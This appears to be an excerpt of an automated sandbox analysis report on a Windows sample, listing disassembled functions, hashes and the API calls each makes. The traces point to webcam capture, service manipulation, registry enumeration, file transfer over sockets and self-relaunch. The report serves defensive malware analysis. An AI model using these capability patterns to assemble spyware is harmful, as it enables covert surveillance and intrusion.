                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                  • Instruction ID: b1c47c875d8f2c0c476e0be15cbc17d2a9a97dd9f0a9771bf61a495cc5245294
                                                  • Opcode Fuzzy Hash: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                  • Instruction Fuzzy Hash: 6E51F572680216AFEF269F64CC41EBB77ABEF40764F154628FC14D6140EBB6EC50CA60
                                                  Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                  • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                  • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                  • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                  Function 02134DA4 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                  • Instruction ID: e08e7d13bbb0f0a9d45039c08dbbdb7abcbbb6a850f86051007a9926898bd814
                                                  • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                  • Instruction Fuzzy Hash: 8C51F972980205AFDB269B688C40EAF77EBEF89334F254129F815D6191EB39D900CA64
                                                  Function 021351A4 Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                  • Instruction ID: 0afd797a50300618fd0d3934aa5cbba155aadf005d8cc3dd054f7378f7e74146
                                                  • Opcode Fuzzy Hash: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                  • Instruction Fuzzy Hash: 1A5160B0940305BEEF229F65C881BEEBAFBFF48714F44442DE599B2251D7B698418F24
                                                  Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 3509577899-3206640213
                                                  • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                  • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                  • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                  • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                  Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                    • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                  • API String ID: 3469354165-462540288
                                                  • Opcode ID: 34750d1dfcef315ceafc5b49fb0bdf248a3e58c9f4d830ec3df60f3ffd46243b
                                                  • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                  • Opcode Fuzzy Hash: 34750d1dfcef315ceafc5b49fb0bdf248a3e58c9f4d830ec3df60f3ffd46243b
                                                  • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                  Function 020F404E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 020F40F1
                                                    • Part of subcall function 020F4234: __EH_prolog.LIBCMT ref: 020F4239
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                  • API String ID: 3469354165-462540288
                                                  • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                  • Instruction ID: f2837c2704995d266ed733c446e382ab7b6371a8f1d84cec00bbcff3ba2891c5
                                                  • Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                  • Instruction Fuzzy Hash: 4A41F631AC43009BCB95FB3898546AE36A3AF45340F404128EF0997EE4EF749A45EF86
                                                  Function 020F6E50 Relevance: 9.1, APIs: 6, Instructions: 97fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 020F6E9F
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 020F6EE7
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F6F27
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 020F6F44
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 020F6F6F
                                                  • DeleteFileW.KERNEL32(00000000), ref: 020F6F7F
                                                    • Part of subcall function 020F47C2: WaitForSingleObject.KERNEL32(?,000000FF,?,?,020F4875,00000000,?,?), ref: 020F47D1
                                                    • Part of subcall function 020F47C2: SetEvent.KERNEL32(?,?,?,020F4875,00000000,?,?), ref: 020F47EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID:
                                                  • API String ID: 1303771098-0
                                                  • Opcode ID: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                  • Instruction ID: 2f7e56b8d57dc722295e343bb94fd44cb06142186bba9580c00d668983e72bf0
                                                  • Opcode Fuzzy Hash: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                  • Instruction Fuzzy Hash: B6318F725483049FC290EF20DD84DDFB7EDFB84711F004A2AFA8592551EB70AA48DF92
                                                  Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                  • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                  Function 02109EEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 02109EFB
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 02109F12
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109F1F
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 02109F2E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction ID: 4ecd3ff61f7337c70af468f094556ce20ebcbdbec1df08c061f3479b6bfb8b89
                                                  • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction Fuzzy Hash: 8D118632585318AFD7116B64ECC4EFF3FACDB45AA2B000035F906921D2DBA4DD06DAB1
                                                  Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                  • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                  • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                  Function 0212806D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,02128064,02127A18), ref: 0212807B
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02128089
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 021280A2
                                                  • SetLastError.KERNEL32(00000000,?,02128064,02127A18), ref: 021280F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction ID: cbb39c1a4b4c3f490ac76509384bc4c437d798de26156a0eb83d8218d6e98d53
                                                  • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction Fuzzy Hash: 3701AC325993315EE7252775BC887172695FB01775F210339F618851E0EF114869965C
                                                  Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • _free.LIBCMT ref: 00446EF6
                                                  • _free.LIBCMT ref: 00446F1E
                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • _abort.LIBCMT ref: 00446F3D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                  Function 02137126 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                  • _free.LIBCMT ref: 0213715D
                                                  • _free.LIBCMT ref: 02137185
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                  • _abort.LIBCMT ref: 021371A4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction ID: 7ca4ee0b79a5e46534bed444284f00eda8e23d8238411d23bd7be48aef164f6d
                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction Fuzzy Hash: 78F0A4B71C47107AC61723346C08F2E666B9BC2BB2F250124F968E22D5EF2288438A55
                                                  Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                  • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                  Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                  • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                  Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                  • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                  Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$DG
                                                  • API String ID: 3554306468-1089238109
                                                  • Opcode ID: 5048a897bec4a4ac36c0964d4dcd002e21d0293fd50c5bb6c8eb0160b70f3baa
                                                  • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                  • Opcode Fuzzy Hash: 5048a897bec4a4ac36c0964d4dcd002e21d0293fd50c5bb6c8eb0160b70f3baa
                                                  • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                  Function 020FC8D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 020FC92E
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FCA8D
                                                  • ExitProcess.KERNEL32 ref: 020FCA99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: @CG$exepath
                                                  • API String ID: 1913171305-1253070338
                                                  • Opcode ID: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                  • Instruction ID: ddac374bf571a9649e9f9664db80820a722e37e2f0e4ef195d2ac38283339c64
                                                  • Opcode Fuzzy Hash: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                  • Instruction Fuzzy Hash: A141B2329803185EDB94FB60DC50EFE737AAF50700F10007AEE06A7995EF246E46DE95
                                                  Function 0213293B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 0213297B
                                                  • _free.LIBCMT ref: 02132A46
                                                  • _free.LIBCMT ref: 02132A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
